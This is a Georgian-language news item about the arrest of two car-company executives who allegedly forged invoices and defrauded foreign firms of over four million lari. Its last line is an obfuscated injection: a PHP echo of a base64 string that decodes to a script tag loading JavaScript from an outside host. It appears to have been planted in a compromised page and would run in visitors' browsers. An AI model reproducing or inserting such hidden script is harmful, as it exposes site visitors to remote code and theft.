celsiusi
ავერსი საქკაბელი
 საქართველოს ფინანსთა სამინისტროს საგამოძიებო სამსახურის თანამშრომლებმა, გატარებული საგამოძიებო მოქმედებების შედეგად, წინასწარი შეთანხმებით ჯგუფის მიერ, მართლსაწინააღმდეგო მისაკუთრების მიზნით, ქონებრივი უფლებამოსილების დამადასტურებელი ყალბი დოკუმენტების დამზადება-გამოყენების გზით, დიდი ოდენობით სხვისი ნივთის მოტყუებით დაუფლების ფაქტზე, საქართველოში რეგისტრირებული კომპანიის ორი ხელმძღვანელი პირი დააკავეს.
გამოძიების ინფორმაციით, ბრალდებულებმა, რომელთა საქმიანობის სფეროსაც წარმოადგენდა ავტომანქანების ყიდვა-გაყიდვა, უცხოური კომპანიების წარმომადგენლებს შესთავაზეს დახმარება საქართველოში არსებული ცენტრებიდან მანქანების შეძენაში და მიწოდებაში.
„სხვისი ქონების მოტყუებით დაუფლების განზრახვით, ბრალდებულებმა გააყალბეს ავტომანქანების შეძენასთან დაკავშირებული ინვოისები, სადაც შეიტანეს ყალბი მონაცემები, თითქოსდა ავტოცენტრებიდან შეძენილ იქნა დამკვეთისათვის სასურველი ძვირადღირებული ავტომანქანები, ცენტრების ანგარიშებზე გადაარიცხინეს გარკვეული თანხები, რომლითაც, ნაცვლად უცხოური კომპანიების მიერ დაკვეთილი ავტომანქანებისა, შეძენილ იქნა ბრალდებულებისათვის სასურველი ავტომანქანები, რომლებიც შემდგომ მათ მიერ გასხვისდა სხვადასხვა პირზე. ამ ეტაპზე დადგენილია, რომ უცხოურ კომპანიებზე მიყენებული ზიანი ჯამში შეადგენს 4 163 332  ლარს“, – აცხადებენ საგამოძიებო სამსახურში.
მათივე ცნობით, გამოძიების პროცესში, დაყადაღებულ იქნა კომპანიის და ბრალდებულების სახელზე რიცხული უძრავ-მოძრავი ქონება და საბანკო ანგარიშები.
გამოძიება გრძელდება საქართველოს სისხლის სამართლის კოდექსის 210-ე მუხლის მეორე და 180-ე მუხლის მესამე ნაწილებით, რაც სასჯელის სახით ითვალისწინებს თავისუფლების აღკვეთას ექვსიდან ცხრა წლამდე ვადით.
260
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");